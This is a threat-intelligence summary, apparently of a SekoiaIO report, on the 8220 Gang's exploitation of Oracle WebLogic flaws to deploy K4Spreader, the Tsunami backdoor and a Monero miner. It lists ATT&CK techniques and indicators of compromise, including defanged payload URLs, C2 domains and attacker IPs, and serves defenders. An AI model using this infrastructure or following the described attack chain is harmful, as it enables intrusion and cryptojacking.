Threat Research

Hadooken and K4Spreader: The 8220 Gang’s Newest Weapons

SekoiaIO

This report documents the 8220 Gang’s attacks on Oracle WebLogic servers, exploiting CVE-2017-10271 and CVE-2020-14883 to deploy K4Spreader, Tsunami, and a cryptominer across Windows and Linux. It notes links to Hadooken, a China-based intrusion set focused on cloud environments, with significant activity in South America, especially Brazil. Hashtags: #K4Spreader #Tsunami #Hadooken #Monero #8220Gang #Brazil #OracleWebLogic

Keypoints

  • Exploitation of CVE-2017-10271 and CVE-2020-14883 in Oracle WebLogic to gain initial access.
  • Malware stack includes K4Spreader, Tsunami backdoor, and a Monero cryptominer.
  • Initial access observed from a single IP address (77.221.151.174) within a 24‑hour window.
  • Both Windows and Linux targets indicate an opportunistic, cross‑platform approach.
  • 8220 Gang is linked to cloud‑environment attacks, with Asia as a primary region and Brazil as a notable victimology.
  • Strong links between K4Spreader and Hadooken suggest a shared operational framework.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploiting WebLogic vulnerabilities to gain access. Quote: “The attacker exploited CVE-2017-10271 and CVE-2020-14883 Weblogic vulnerabilities to deploy Python and Bash scripts, executing the K4Spreader malware.”
  • [T1059.006] Command and Scripting Interpreter: Python – Brief description: “Execution of malicious scripts (Python, Bash, PowerShell) to deploy malware.” Quote: “Execution of malicious scripts (Python, Bash, PowerShell) to deploy malware.”
  • [T1059.004] Command and Scripting Interpreter: Bash – Brief description: Linux/Unix scripting used to deploy payloads. Quote: “Execution of malicious scripts (Python, Bash, PowerShell) to deploy malware.”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Brief description: Windows payloads using PowerShell. Quote: “PowerShell script designed to install a cryptominer via a .NET-based loader.”
  • [T1053.005] Scheduled Task/Job: Cron – Brief description: “Creation of cron jobs to maintain persistence on infected systems.” Quote: “Creation of cron jobs to maintain persistence on infected systems.”
  • [T1110.001] Credential Access: SSH Brute Force – Brief description: “SSH brute force attempts to spread across the network.” Quote: “SSH brute force attempts to spread across the network.”
  • [T1071] Application Layer Protocol: IRC – Brief description: “Use of IRC for command and control communication.” Quote: “Use of IRC for command and control communication.”
  • [T1496] Resource Hijacking – Brief description: “Mining Monero cryptocurrency using compromised resources.” Quote: “Mining of Monero cryptocurrency using compromised resources.”

Indicators of Compromise

  • [IP] – Observed exploitation/attack origins – 77.221.151.174, 80.78.24.30
  • [IP] – Mining/C2 activity addresses – 51.222.111.116:80, 198.199.85.230
  • [Domain] – Download/C2 domains – sck-dns.cc, play.sck-dns.cc
  • [Domain] – C2/alias domains – c4k-ircd.pwndns.pw (alias to pwn.oracleservice.top)
  • [Wallet] – Monero wallet used for mining – 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
  • [URL] – Download/loader files – hxxp://154.213.192[.]44/Ueordwfkay.pdf, hxxp://154.213.192[.]44/plugin3.dll
  • [File] – Loader/application artifacts – CCleaner64.exe, 2.gif

Read more: https://blog.sekoia.io/hadooken-and-k4spreader-the-8220-gangs-latest-arsenal/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint